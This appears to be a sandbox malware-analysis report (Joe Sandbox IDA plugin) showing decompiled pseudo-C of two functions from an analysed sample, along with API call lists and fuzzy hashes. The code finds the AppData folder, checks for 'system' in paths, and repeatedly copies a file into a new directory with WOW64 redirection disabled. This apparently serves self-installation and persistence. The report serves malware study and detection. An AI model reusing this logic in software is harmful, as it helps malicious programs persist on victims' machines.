API ID: MemoryProcessVirtualWrite$Alloc$lstrcmp$Protect$ErrorLast
String ID:
API String ID: 4278583544-0
Opcode ID: 4ee791f2a5bc95521b3879a4f99f7e9d626f2d7af49aa0a8ac43a41e11b67dd5
Instruction ID: f4bd8550ddabc2b7f1f6ce3864521f6c2362bd0328109173a99f6deeda7ecf31
Opcode Fuzzy Hash: 4ee791f2a5bc95521b3879a4f99f7e9d626f2d7af49aa0a8ac43a41e11b67dd5
Instruction Fuzzy Hash: CA422470608705EFE724CF25C894B6BBBE6BF89704F14892DE68987352DB30E845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 006E3EC0, Relevance: 15.3, APIs: 10, Instructions: 343
filestringCOMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E006E3EC0(void* __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t82;
				intOrPtr _t83;
				WCHAR* _t84;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t87;
				WCHAR* _t94;
				void* _t96;
				signed int _t99;
				signed short* _t106;
				int* _t107;
				signed short* _t109;
				signed short* _t110;
				signed short* _t113;
				intOrPtr _t122;
				signed int _t125;
				WCHAR* _t132;
				short* _t133;
				WCHAR* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				signed int _t140;
				signed short** _t141;
				void* _t143;
				void* _t144;
				signed short* _t149;
				signed short _t150;
				signed int _t157;
				signed int _t159;
				intOrPtr* _t162;
				intOrPtr _t169;
				WCHAR* _t170;
				signed int _t171;
				intOrPtr* _t172;
				signed int _t173;
				intOrPtr _t174;
				signed int* _t175;
				void* _t177;
				void* _t178;
				void* _t179;
				WCHAR** _t183;
				signed short* _t184;
				signed short** _t185;
				void* _t186;
				void* _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				void* _t190;
				void* _t191;
				intOrPtr* _t192;
				void* _t193;
				short _t218;

				_t169 =  *((intOrPtr*)(_t186 + 0x464));
				_t137 = _t186 + 0x18;
				_t171 = 0;
				 *((intOrPtr*)(_t186 + 0xc)) = 0;
				 *((intOrPtr*)(_t186 + 4)) = 0;
				 *((intOrPtr*)(_t186 + 0x14)) = 0;
				E006F43C0(_t137, __edx, __eflags);
				if(_t169 == 0) {
					L3:
					_t172 = _t186 + 4;
					E006EAE30(_t172, _t186 + 8);
					_t187 = _t186 + 8;
					_t82 =  *_t172;
				} else {
					while( *((short*)(_t169 + _t171 * 2)) != 0) {
						_t171 = _t171 + 1;
						if(_t171 != 0x800) {
							continue;
						} else {
							goto L3;
						}
						goto L5;
					}
					_t82 = E006EB7A0(_t169);
					_t187 = _t186 + 4;
					 *((intOrPtr*)(_t187 + 4)) = _t82;
					 *(_t187 + 8) = _t171;
				}
				L5:
				_t83 = E006EB7A0(_t82);
				_t188 = _t187 + 4;
				_t173 =  *(_t188 + 8);
				 *_t188 = _t83;
				_t184 = _t83 + _t173 * 2;
				_t84 = E006EB7A0( *((intOrPtr*)(_t188 + 4)));
				_t189 = _t188 + 4;
				_t170 = _t84;
				if(_t173 <= 0) {
					_t174 =  *_t189;
				} else {
					_t174 =  *_t189;
					while(( *_t184 & 0x0000ffff) != 0x5c) {
						_t184 =  &(_t184[0xffffffffffffffff]);
						if(_t184 > _t174) {
							continue;
						} else {
						}
						goto L12;
					}
					 *_t184 = 0;
					_t184 =  &(_t184[1]);
					__eflags = _t184;
				}
				L12:
				_t85 = E006EB7A0(_t174);
				_t190 = _t189 + 4;
				 *((intOrPtr*)( *((intOrPtr*)(_t190 + 0x468)))) = _t85;
				_t86 = E006EB7A0( *((intOrPtr*)(_t190 + 4)));
				_t191 = _t190 + 4;
				_t147 =  *((intOrPtr*)(_t191 + 0x46c));
				 *((intOrPtr*)( *((intOrPtr*)(_t191 + 0x46c)))) = _t86;
				_push(_t137);
				_push(_t174);
				_t87 = E006EC7C0();
				_t192 = _t191 + 8;
				_t138 = 0;
				if(_t87 == 0) {
					if( *0x6f9ae8 == 0) {
						_t94 =  *(_t192 + 0xc);
					} else {
						_t183 = _t192 + 0xc;
						_push(_t183);
						E006E8CD0(_t147);
						_t192 = _t192 + 4;
						_t94 =  *_t183;
						if(_t94 != 0) {
							_t174 =  *_t192;
						} else {
							_t174 =  *_t192;
							if( *((intOrPtr*)(_t192 + 8)) != 0) {
								_t159 =  *_t170 & 0x0000ffff;
								_t132 = _t170;
								if(_t159 != 0) {
									_t135 = _t170;
									do {
										if((_t159 - 0x00000041 & 0x0000ffff) <= 0x19) {
											 *_t135 = _t159 + 0x20;
										}
										_t159 = _t135[1] & 0x0000ffff;
										_t135 =  &(_t135[1]);
									} while (_t159 != 0);
								}
								_t133 =  &(_t132[0xfffffffffffffffa]);
								while(_t133 > _t170) {
									__eflags =  *_t133 - 0x790073;
									if( *_t133 != 0x790073) {
										L25:
										_t133 =  &(_t133[0xffffffffffffffff]);
										__eflags = _t133;
										continue;
									} else {
										__eflags = _t133[2] - 0x740073;
										if(_t133[2] != 0x740073) {
											goto L25;
										} else {
											__eflags = _t133[4] - 0x6d0065;
											if(_t133[4] == 0x6d0065) {
												L28:
												 *(_t192 + 0xc) = 0xffffffff;
												_t94 = 0xffffffffffffffff;
											} else {
												goto L25;
											}
										}
									}
									goto L31;
								}
								_t94 = 0;
								if( *((intOrPtr*)(_t192 + 8)) <= 0x11) {
									goto L28;
								}
							}
						}
					}
					L31:
					_t162 =  *0x6f9de4;
					_t149 = 0;
					_t139 = _t192 + 0x40;
					 *(_t192 + 0x10) = 0;
					while(1) {
						L33:
						_push(_t139);
						_push(_t149);
						_push(_t94);
						_push(0x1a);
						_push(_t149);
						if( *_t162() >= 0) {
							goto L35;
						}
						_t138 = 0;
						_push(_t192 + 0x40);
						_push(0);
						_push(0xffffffff);
						_push(0x1a);
						_push(0);
						if( *0x6f9de4() >= 0) {
							goto L35;
						}
						goto L74;
						L35:
						_t96 =  *(_t192 + 0xc);
						if(_t96 != 0) {
							CloseHandle(_t96);
						}
						if( *(_t192 + 0x40) == 0) {
							_t140 = 0;
							__eflags = 0;
							_t175 = _t192 + 0x40;
						} else {
							_t144 = 0;
							_t178 = _t192 + 0x40;
							do {
								_t144 = _t144 + 1;
								_t218 =  *((short*)(_t178 + 2));
								_t178 = _t178 + 2;
							} while (_t218 != 0);
						}
						if(_t140 >=  *((intOrPtr*)(_t192 + 8))) {
							L44:
							E006F4520(_t192 + 0x24c, 0x4d);
							_t193 = _t192 + 8;
							_t99 =  *(_t193 + 0x248) & 0x0000ffff;
							 *_t175 = _t99;
							if(_t99 != 0) {
								_t125 = 0;
								do {
									_t157 =  *(_t193 + 0x24a + _t125 * 2) & 0x0000ffff;
									 *(_t175 + 2 + _t125 * 2) = _t157;
									_t125 = _t125 + 1;
								} while (_t157 != 0);
								_t140 = _t140 + _t125;
							}
							CreateDirectoryW(_t193 + 0x44, 0);
							_t170 = E006E3180(_t140 + _t140 + 0x208, _t170);
							E006EC400(_t170, _t193 + 0x44, _t140 + _t140 + 2);
							_t192 = _t193 + 0x14;
							_t58 = _t140 * 2; // 0xa
							_t106 = _t170 + _t58 + 0xa;
							 *((intOrPtr*)(_t106 - 0xa)) = 0x5c;
							while(1) {
								_t150 =  *_t184 & 0x0000ffff;
								if(_t150 == 0) {
									break;
								}
								if((_t150 & 0x0000ffff) != 0x2e) {
									_t143 = _t150 + 2;
									__eflags = (_t150 - 0x00000049 & 0x0000ffff) - 0xe;
									_t154 =  <  ? _t143 : _t150;
									__eflags = (_t150 - 0x00000035 & 0x0000ffff) - 3;
									_t155 =  <  ? _t143 :  <  ? _t143 : _t150;
									__eflags = (_t150 - 0x0000006b & 0x0000ffff) - 9;
									_t156 =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
									_t184 =  &(_t184[1]);
									 *((short*)(_t106 - 8)) =  <  ? _t143 :  <  ? _t143 :  <  ? _t143 : _t150;
									_t106 =  &(_t106[1]);
									__eflags = _t106;
									continue;
								} else {
									 *((intOrPtr*)(_t106 - 8)) = 0x65002e;
									 *((intOrPtr*)(_t106 - 4)) = 0x650078;
								}
								L54:
								_t177 = 0xfffffffd;
								_t139 = _t192 + 0x40;
								 *_t107 = 0;
								while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
									SleepEx(0x3e8, 0);
									_t177 = _t177 + 1;
									if(_t177 != 0) {
										continue;
									} else {
										if( *((intOrPtr*)( *0x6f9c88)) == 0) {
											L67:
											if( *(_t192 + 0x10) == 0) {
												_t174 =  *_t192;
												_t162 =  *0x6f9de4;
												 *(_t192 + 0xc) = 0xffffffff;
												_t94 = 0xffffffffffffffff;
												 *(_t192 + 0x10) = 1;
												_t149 = 0;
												__eflags = 0;
												goto L33;
											} else {
												goto L68;
											}
										} else {
											_push(_t192 + 0x14);
											if( *0x6f9c88() == 0) {
												goto L67;
											} else {
												_t179 = 3;
												while(CopyFileW( *(_t192 + 0xc), _t170, 0) == 0) {
													SleepEx(0x3e8, 0);
													_t179 = _t179 - 1;
													if(_t179 != 0) {
														continue;
													} else {
														_t179 = 0;
													}
													break;
												}
												_t122 =  *((intOrPtr*)(_t192 + 0x14));
												if(_t122 != 0 &&  *((intOrPtr*)( *0x6f9c78)) != 0) {
													 *0x6f9c78(_t122);
												}
												if(_t179 != 0) {
													break;
												} else {
													goto L67;
												}
											}
										}
									}
									goto L74;
								}
								_t185 =  *(_t192 + 0x468);
								_t109 =  *_t185;
								__eflags = _t109;
								if(_t109 != 0) {
									E006E91E0(_t109);
									_t192 = _t192 + 4;
								}
								_t141 =  *(_t192 + 0x46c);
								_t174 =  *_t192;
								_t110 =  *_t141;
								__eflags = _t110;
								if(_t110 != 0) {
									E006E91E0(_t110);
									_t192 = _t192 + 4;
								}
								 *_t185 = E006EB7A0(_t192 + 0x40);
								_t113 = E006EB7A0(_t170);
								_t192 = _t192 + 8;
								 *_t141 = _t113;
								_t138 = 1;
								__eflags = 1;
								goto L74;
							}
							_t107 =  &(_t106[0xfffffffffffffffc]);
							__eflags = _t107;
							goto L54;
						} else {
							_t170[_t140] = 0;
							if(lstrcmpiW(_t170, _t192 + 0x40) == 0) {
								L68:
								_t174 =  *_t192;
								_t138 = 0;
							} else {
								goto L44;
							}
						}
						goto L74;
					}
				}
				L74:
				_t88 =  *((intOrPtr*)(_t192 + 4));
				if( *((intOrPtr*)(_t192 + 4)) != 0) {
					E006E91E0(_t88);
					_t192 = _t192 + 4;
				}
				if(_t174 != 0) {
					E006E91E0(_t174);
					_t192 = _t192 + 4;
				}
				if(_t170 != 0) {
					E006E91E0(_t170);
					_t192 = _t192 + 4;
				}
				E006F16C0(_t192 + 0x18, _t170);
				return _t138;
			}

0x006e3eca
0x006e3ed1
0x006e3ed5
0x006e3ed9
0x006e3edd
0x006e3ee1
0x006e3ee5
0x006e3eec
0x006e3efe
0x006e3f02
0x006e3f08
0x006e3f0d
0x006e3f10
0x006e3eee
0x006e3eee
0x006e3ef5
0x006e3efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x006e3efc
0x006e3f15
0x006e3f1a
0x006e3f1d
0x006e3f21
0x006e3f21
0x006e3f25
0x006e3f26
0x006e3f2b
0x006e3f2e
0x006e3f32
0x006e3f35
0x006e3f3c
0x006e3f41
0x006e3f44
0x006e3f48
0x006e3f5f
0x006e3f4a
0x006e3f4a
0x006e3f4d
0x006e3f56
0x006e3f5b
0x00000000
0x00000000
0x006e3f5d
0x00000000
0x006e3f5b
0x006e3f64
0x006e3f6a
0x006e3f6a
0x006e3f6a
0x006e3f6d
0x006e3f6e
0x006e3f73
0x006e3f7d
0x006e3f83
0x006e3f88
0x006e3f8b
0x006e3f92
0x006e3f94
0x006e3f95
0x006e3f96
0x006e3f9b
0x006e3f9e
0x006e3fa2
0x006e3faf
0x006e4038
0x006e3fb5
0x006e3fb5
0x006e3fb9
0x006e3fba
0x006e3fbf
0x006e3fc2
0x006e3fc6
0x006e403e
0x006e3fc8
0x006e3fcc
0x006e3fd1
0x006e3fd3
0x006e3fd6
0x006e3fdb
0x006e3fdd
0x006e3fdf
0x006e3fe8
0x006e3fed
0x006e3fed
0x006e3ff0
0x006e3ff4
0x006e3ff7
0x006e3fdf
0x006e3ffc
0x006e401e
0x006e4001
0x006e4007
0x006e401b
0x006e401b
0x006e401b
0x00000000
0x006e4009
0x006e4009
0x006e4010
0x00000000
0x006e4012
0x006e4012
0x006e4019
0x006e402b
0x006e402d
0x006e4035
0x00000000
0x00000000
0x00000000
0x006e4019
0x006e4010
0x00000000
0x006e4007
0x006e4022
0x006e4029
0x00000000
0x00000000
0x006e4029
0x006e3fd1
0x006e3fc6
0x006e4041
0x006e4041
0x006e4047
0x006e4049
0x006e404d
0x006e4074
0x006e4074
0x006e4074
0x006e4075
0x006e4076
0x006e4077
0x006e4079
0x006e407e
0x00000000
0x00000000
0x006e4080
0x006e4086
0x006e4087
0x006e4088
0x006e408a
0x006e408c
0x006e4095
0x00000000
0x00000000
0x00000000
0x006e409b
0x006e409b
0x006e40a1
0x006e40a4
0x006e40a4
0x006e40b0
0x006e40c5
0x006e40c5
0x006e40c7
0x006e40b2
0x006e40b2
0x006e40b4
0x006e40b8
0x006e40b8
0x006e40b9
0x006e40be
0x006e40be
0x006e40c3
0x006e40cf
0x006e40eb
0x006e40f5
0x006e40fa
0x006e40fd
0x006e4108
0x006e410b
0x006e410d
0x006e410f
0x006e410f
0x006e4117
0x006e411f
0x006e411f
0x006e4124
0x006e4124
0x006e412f
0x006e4146
0x006e414f
0x006e4154
0x006e4157
0x006e4157
0x006e415b
0x006e4195
0x006e4195
0x006e419c
0x00000000
0x00000000
0x006e41a4
0x006e416a
0x006e4173
0x006e4179
0x006e417c
0x006e4182
0x006e4185
0x006e4188
0x006e418b
0x006e418e
0x006e4192
0x006e4192
0x00000000
0x006e41a6
0x006e41a6
0x006e41ad
0x006e41ad
0x006e41b9
0x006e41b9
0x006e41be
0x006e41c2
0x006e41c8
0x006e41e4
0x006e41ea
0x006e41eb
0x00000000
0x006e41ed
0x006e41f5
0x006e424c
0x006e4251
0x006e4059
0x006e405c
0x006e4062
0x006e406a
0x006e406e
0x006e4072
0x006e4072
0x00000000
0x00000000
0x00000000
0x00000000
0x006e41f7
0x006e41fb
0x006e4204
0x00000000
0x006e4206
0x006e4206
0x006e420b
0x006e4223
0x006e4229
0x006e422a
0x00000000
0x006e422c
0x006e422c
0x006e422c
0x00000000
0x006e422a
0x006e422e
0x006e4234
0x006e4242
0x006e4242
0x006e424a
0x00000000
0x00000000
0x00000000
0x00000000
0x006e424a
0x006e4204
0x006e41f5
0x00000000
0x006e41eb
0x006e425e
0x006e4265
0x006e4268
0x006e426a
0x006e426d
0x006e4272
0x006e4272
0x006e4275
0x006e427c
0x006e427f
0x006e4281
0x006e4283
0x006e4286
0x006e428b
0x006e428b
0x006e429b
0x006e429f
0x006e42a4
0x006e42a7
0x006e42ab
0x006e42ab
0x00000000
0x006e42ab
0x006e41b6
0x006e41b6
0x00000000
0x006e40d1
0x006e40d5
0x006e40e5
0x006e4257
0x006e4257
0x006e425a
0x00000000
0x00000000
0x00000000
0x006e40e5
0x00000000
0x006e40cf
0x006e4074
0x006e42ac
0x006e42ac
0x006e42b2
0x006e42b5
0x006e42ba
0x006e42ba
0x006e42bf
0x006e42c2
0x006e42c7
0x006e42c7
0x006e42cc
0x006e42cf
0x006e42d4
0x006e42d4
0x006e42db
0x006e42ec

APIs

Part of subcall function 006F43C0: InitializeCriticalSectionAndSpinCount.KERNEL32(006F9BBC,00000800,002FD120,?,00000000,?,006E962D,?,?,?,?,?,00000000,002FD120,00000000,?), ref: 006F43F6

SHGetFolderPathW.SHELL32(00000000,0000001A,000000FF,00000000,?), ref: 006E408D
CloseHandle.KERNEL32(FFFFFFFF), ref: 006E40A4
lstrcmpiW.KERNEL32(00000000,00000000), ref: 006E40DD
CreateDirectoryW.KERNEL32(?,00000000), ref: 006E412F
CopyFileW.KERNEL32(?,00000000,00000000), ref: 006E41CF
SleepEx.KERNEL32(000003E8,00000000), ref: 006E41E4
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 006E41FC
CopyFileW.KERNEL32(?,00000000,00000000), ref: 006E4212
SleepEx.KERNEL32(000003E8,00000000), ref: 006E4223
Wow64RevertWow64FsRedirection.KERNEL32(?), ref: 006E4242

Part of subcall function 006E91E0: RtlFreeHeap.NTDLL(00000008,?,006E9F64), ref: 006E91F1

Memory Dump Source

Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_______.jbxd

Similarity

API ID: Wow64$CopyFileRedirectionSleep$CloseCountCreateCriticalDirectoryDisableFolderFreeHandleHeapInitializePathRevertSectionSpinlstrcmpi
String ID:
API String ID: 1225154383-0
Opcode ID: 30a262e4c374b776f57ede8c47a8e38df9f701d6c41a292b43bcee1ad8a4618a
Instruction ID: 89a69b151e67908fa13f07f30c8ca2dcc5af6a806546d68c867ea50dc6daf293
Opcode Fuzzy Hash: 30a262e4c374b776f57ede8c47a8e38df9f701d6c41a292b43bcee1ad8a4618a
Instruction Fuzzy Hash: 4EC1F3B19053919BDB209F26DC88BAB73E6EF80314F04452CF98587390EB31DA45CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 006F1A70, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 416
stringthreadCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E006F1A70(intOrPtr __ecx) {
				signed int _t166;
				signed int _t167;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t177;
				signed int _t178;
				int _t194;
				WCHAR** _t202;
				WCHAR** _t207;
				signed int _t212;
				intOrPtr _t216;
				int _t222;
				signed int _t224;
				void* _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				intOrPtr _t251;
				void* _t256;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				signed int _t265;
				signed int _t269;
				signed int _t271;
				intOrPtr _t277;
				void* _t279;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				intOrPtr _t284;
				void* _t286;
				signed int _t287;
				WCHAR* _t288;
				signed int _t289;
				void* _t290;
				WCHAR* _t292;
				WCHAR** _t293;
				signed int _t295;
				intOrPtr _t298;
				void* _t299;
				signed int _t300;
				intOrPtr* _t301;
				intOrPtr* _t303;

				if( *((intOrPtr*)(__ecx)) <= 0) {
					L79:
					return 1;
				} else {
					_t166 = 1;
					_t286 = 0;
					_t243 = 0;
					 *_t303 = __ecx;
					do {
						 *(_t303 + 0x10) = _t243;
						if((_t166 & 0x00000001) == 0) {
							_t167 =  *_t286;
							__eflags = _t167;
							if(_t167 != 0) {
								E006E91E0(_t167);
								_t303 = _t303 + 4;
							}
							_t168 =  *(_t286 + 4);
							__eflags = _t168;
							if(_t168 != 0) {
								E006E91E0(_t168);
								_t303 = _t303 + 4;
							}
							_t169 =  *(_t286 + 8);
							__eflags = _t169;
							if(_t169 != 0) {
								E006E91E0(_t169);
								_t303 = _t303 + 4;
							}
							_t170 =  *(_t286 + 0x10);
							__eflags = _t170;
							if(_t170 != 0) {
								E006E91E0(_t170);
								_t303 = _t303 + 4;
							}
							_t171 = _t286;
							_t31 = _t286 + 4; // 0x4
							_t287 = _t286 + 8;
							_t33 = _t171 + 0x10; // 0x10
							_t34 = _t171 + 0xc; // 0xc
							_t290 = _t34;
							_t299 = _t171;
							_t172 =  *(_t171 + 0xc);
							 *(_t303 + 4) = _t31;
							 *(_t303 + 0xc) = _t33;
							__eflags = _t172;
							if(_t172 != 0) {
								E006E91E0(_t172);
								_t303 = _t303 + 4;
							}
							_t245 = _t287;
							_t286 = _t299;
						} else {
							_t241 = E006E3180(0x1c, 0);
							_t303 = _t303 + 8;
							_t286 = _t241;
							_t22 = _t241 + 0xc; // 0xc
							_t290 = _t22;
							_t24 = _t286 + 4; // 0x4
							 *(_t303 + 0xc) = _t241 + 0x10;
							_t26 = _t286 + 8; // 0x8
							_t245 = _t26;
							 *(_t303 + 4) = _t24;
						}
						_t277 =  *_t303;
						_t300 =  *(_t303 + 0x10);
						 *((intOrPtr*)(_t286 + 0x18)) = 0;
						 *((intOrPtr*)(_t286 + 0x14)) = 0;
						 *(_t286 + 0x10) = 0;
						 *((intOrPtr*)(_t286 + 0xc)) = 0;
						 *(_t286 + 8) = 0;
						 *(_t286 + 4) = 0;
						 *_t286 = 0;
						_t48 = _t286 + 0x14; // 0x14
						 *(_t303 + 0x14) = _t245;
						_t177 = E006EB3F0( *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4)),  *(_t303 + 0x14), _t245,  *(_t303 + 0x14), _t48, _t290);
						_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 4)) + _t300 * 4));
						if(_t177 == 0) {
							_t178 = E006E22A0(_t251);
							__eflags = _t178;
							if(_t178 == 0) {
								_t301 =  *_t303;
								_t246 =  *(_t303 + 0x10);
								_push( *( *(_t301 + 4) + _t246 * 4));
								_t178 = E006F3360();
								__eflags = _t178;
								 *_t286 = _t178;
								if(_t178 != 0) {
									_push(_t286);
									_t178 = E006F4EA0(_t301);
								}
								goto L66;
							}
							_t246 =  *(_t303 + 0x10);
							goto L33;
						} else {
							_push(_t251);
							_t178 = E006F3360();
							_t292 = _t303 + 0x1c;
							 *(_t303 + 0xc) = _t286;
							 *_t286 = _t178;
							if(_t178 == 0) {
								_t246 =  *(_t303 + 0x10);
								_t301 =  *_t303;
								_t286 =  *(_t303 + 0xc);
								goto L66;
							}
							_t288 = _t292;
							E006F4520(_t292, 0x96);
							_t303 = _t303 + 8;
							_t293 =  *(_t303 + 8);
							if(lstrcmpiW( *_t293, _t292) == 0) {
								_t301 =  *_t303;
								_t286 =  *(_t303 + 0xc);
								_push(_t286);
								_t178 = E006E4C20(_t301);
								_t246 =  *(_t303 + 0x10);
								goto L66;
							}
							E006F4520(_t288, 0x97);
							_t303 = _t303 + 8;
							_t194 = lstrcmpiW( *_t293, _t288);
							_t246 =  *(_t303 + 0x10);
							_t286 =  *(_t303 + 0xc);
							if(_t194 == 0) {
								_t301 =  *_t303;
								_push(_t286);
								E006F4EA0(_t301);
								__eflags = _t246;
								_t178 = 0 | _t246 > 0x00000000;
								_t246 = _t246 - _t178;
								goto L66;
							}
							E006F4520(_t303 + 0x20, 0x98);
							_t303 = _t303 + 8;
							if(lstrcmpiW( *_t293, _t303 + 0x1c) == 0) {
								_t178 =  *( *(_t303 + 8));
								__eflags = _t178;
								if(_t178 == 0) {
									L33:
									_t301 =  *_t303;
									goto L66;
								}
								__eflags =  *_t178;
								if( *_t178 == 0) {
									goto L33;
								}
								_t301 =  *_t303;
								_t279 = 1;
								__eflags = 1;
								while(1) {
									_t91 = _t279 + 1; // 0x2
									_t256 = _t91;
									__eflags = _t279 - 0x1ff;
									if(_t279 > 0x1ff) {
										break;
									}
									__eflags =  *(_t178 + _t279);
									_t279 = _t256;
									if(__eflags != 0) {
										continue;
									}
									break;
								}
								_t93 = _t256 - 2; // 0x0
								__eflags = _t93 - 0x1fe;
								if(_t93 > 0x1fe) {
									goto L66;
								}
								_t202 = E006E7400(_t178, _t256 - 1);
								_t303 = _t303 + 8;
								 *(_t303 + 8) = _t202;
								_t178 =  *( *(_t301 + 4) + _t246 * 4);
								_t258 =  *(_t178 + 0x58);
								 *(_t303 + 0x14) = _t178;
								__eflags = _t258;
								if(_t258 <= 0) {
									_t281 = 0;
									__eflags = 0;
									L3:
									__eflags = _t281 - _t258;
									if(_t281 != _t258) {
										goto L66;
									}
									_t178 = E006E3180(8 + _t258 * 8,  *((intOrPtr*)( *(_t303 + 0x14) + 0x54)));
									_t303 = _t303 + 8;
									_t282 = 0;
									__eflags = _t178;
									if(_t178 != 0) {
										_t269 =  *(_t301 + 4);
										_t284 =  *((intOrPtr*)(_t269 + _t246 * 4));
										 *(_t303 + 0x14) = _t269;
										 *(_t178 +  *(_t284 + 0x58) * 4) =  *(_t303 + 8);
										 *(_t284 + 0x54) = _t178;
										_t282 = 0;
										_t178 =  *( *(_t303 + 0x14) + _t246 * 4);
										_t17 = _t178 + 0x58;
										 *_t17 =  *(_t178 + 0x58) + 1;
										__eflags =  *_t17;
									}
									_t295 = 0xffffffffffffffff;
									_t261 = 1;
									L55:
									if(_t261 == 0 ||  *0x6f9c24 > 0x31) {
										goto L66;
									} else {
										 *((intOrPtr*)(_t286 + 0x18)) =  *((intOrPtr*)(_t303 + 0xf8));
										 *(_t303 + 8) = _t282;
										_t207 = E006EB7A0( *( *(_t303 + 4)));
										_t303 = _t303 + 4;
										 *(_t303 + 8) = _t207;
										_t178 = CreateThread(0, 0, E006F13A0, _t286, 0, _t303 + 0x18);
										if( *(_t303 + 4) == 0) {
											L65:
											_t286 = 0;
											goto L66;
										}
										_t211 =  *( *(_t301 + 4) + _t246 * 4);
										_t262 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
										if(_t295 < 0 || _t295 >= _t262) {
											_t212 = E006E3180(8 + _t262 * 8,  *((intOrPtr*)(_t211 + 0x4c)));
											_t303 = _t303 + 8;
											__eflags = _t212;
											if(_t212 == 0) {
												goto L63;
											}
											_t289 = _t212;
											 *(_t289 +  *( *( *(_t301 + 4) + _t246 * 4) + 0x50) * 8) =  *(_t303 + 8);
											_t216 = E006F4E70();
											_t265 =  *(_t301 + 4);
											_t283 =  *(_t265 + _t246 * 4);
											 *((intOrPtr*)(_t289 + 4 +  *(_t283 + 0x50) * 8)) = _t216;
											 *(_t283 + 0x4c) = _t289;
											_t178 =  *(_t265 + _t246 * 4);
											 *((intOrPtr*)(_t178 + 0x50)) =  *((intOrPtr*)(_t178 + 0x50)) + 1;
										} else {
											 *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) = E006F4E70();
											L63:
											_t178 =  *(_t303 + 8);
											if(_t178 != 0) {
												_t178 = E006E91E0(_t178);
												_t303 = _t303 + 4;
											}
										}
										goto L65;
									}
								}
								_t298 =  *((intOrPtr*)(_t178 + 0x54));
								_t281 = 0;
								__eflags = 0;
								while(1) {
									_t178 =  *(_t303 + 8);
									__eflags =  *((intOrPtr*)(_t298 + _t281 * 4)) - _t178;
									if( *((intOrPtr*)(_t298 + _t281 * 4)) == _t178) {
										goto L3;
									}
									_t281 = _t281 + 1;
									__eflags = _t281 - _t258;
									if(_t281 < _t258) {
										continue;
									}
									goto L3;
								}
								goto L3;
							}
							E006F4520(_t303 + 0x20, 0x6a);
							_t303 = _t303 + 8;
							_t222 = lstrcmpiW( *_t293, _t303 + 0x1c);
							_t301 =  *_t303;
							if(_t222 == 0) {
								L27:
								_t295 = 0;
								_t271 =  *( *(_t301 + 4) + _t246 * 4);
								_t224 =  *(_t271 + 0x50);
								if(_t224 <= 0) {
									L51:
									if(_t295 >= _t224) {
										_t178 = 1;
										__eflags = 1;
										_t261 = 1;
									} else {
										_t261 = 0 | E006F4E70() -  *((intOrPtr*)( *((intOrPtr*)( *( *(_t301 + 4) + _t246 * 4) + 0x4c)) + 4 + _t295 * 8)) - 0x00000707 > 0x00000000;
										_t178 = 1;
									}
									_t282 = _t178;
									goto L55;
								}
								while(lstrcmpiW( *( *((intOrPtr*)(_t271 + 0x4c)) + _t295 * 8),  *( *(_t303 + 4))) != 0) {
									_t295 = _t295 + 1;
									_t271 =  *( *(_t301 + 4) + _t246 * 4);
									_t224 =  *(_t271 + 0x50);
									if(_t295 < _t224) {
										continue;
									}
									goto L51;
								}
								_t224 =  *( *( *(_t301 + 4) + _t246 * 4) + 0x50);
								goto L51;
							}
							 *(_t303 + 0x1c) = 0x44;
							_t178 = lstrcmpiW( *( *(_t303 + 8)), _t303 + 0x1c);
							_t282 = 0;
							_t295 = 0xffffffff;
							_t261 = 1;
							if(_t178 != 0) {
								goto L55;
							}
							goto L27;
						}
						L66:
						_t243 = _t246 + 1;
						_t166 = _t178 & 0xffffff00 | _t286 == 0x00000000;
					} while (_t243 <  *_t301);
					if(_t286 != 0) {
						_t180 =  *_t286;
						if( *_t286 != 0) {
							E006E91E0(_t180);
							_t303 = _t303 + 4;
						}
						_t181 =  *(_t286 + 4);
						if( *(_t286 + 4) != 0) {
							E006E91E0(_t181);
							_t303 = _t303 + 4;
						}
						_t182 =  *(_t286 + 8);
						if( *(_t286 + 8) != 0) {
							E006E91E0(_t182);
							_t303 = _t303 + 4;
						}
						_t183 =  *(_t286 + 0x10);
						if( *(_t286 + 0x10) != 0) {
							E006E91E0(_t183);
							_t303 = _t303 + 4;
						}
						_t184 =  *((intOrPtr*)(_t286 + 0xc));
						if( *((intOrPtr*)(_t286 + 0xc)) != 0) {
							E006E91E0(_t184);
							_t303 = _t303 + 4;
						}
						E006E91E0(_t286);
					}
					goto L79;
				}
			}

0x006f1a7d
0x006f1f40
0x006f1f4d
0x006f1a83
0x006f1a83
0x006f1a85
0x006f1a87
0x006f1a89
0x006f1ae3
0x006f1ae5
0x006f1ae9
0x006f1b0f
0x006f1b11
0x006f1b13
0x006f1b16
0x006f1b1b
0x006f1b1b
0x006f1b1e
0x006f1b21
0x006f1b23
0x006f1b26
0x006f1b2b
0x006f1b2b
0x006f1b2e
0x006f1b31
0x006f1b33
0x006f1b36
0x006f1b3b
0x006f1b3b
0x006f1b3e
0x006f1b41
0x006f1b43
0x006f1b46
0x006f1b4b
0x006f1b4b
0x006f1b4e
0x006f1b50
0x006f1b53
0x006f1b56
0x006f1b59
0x006f1b59
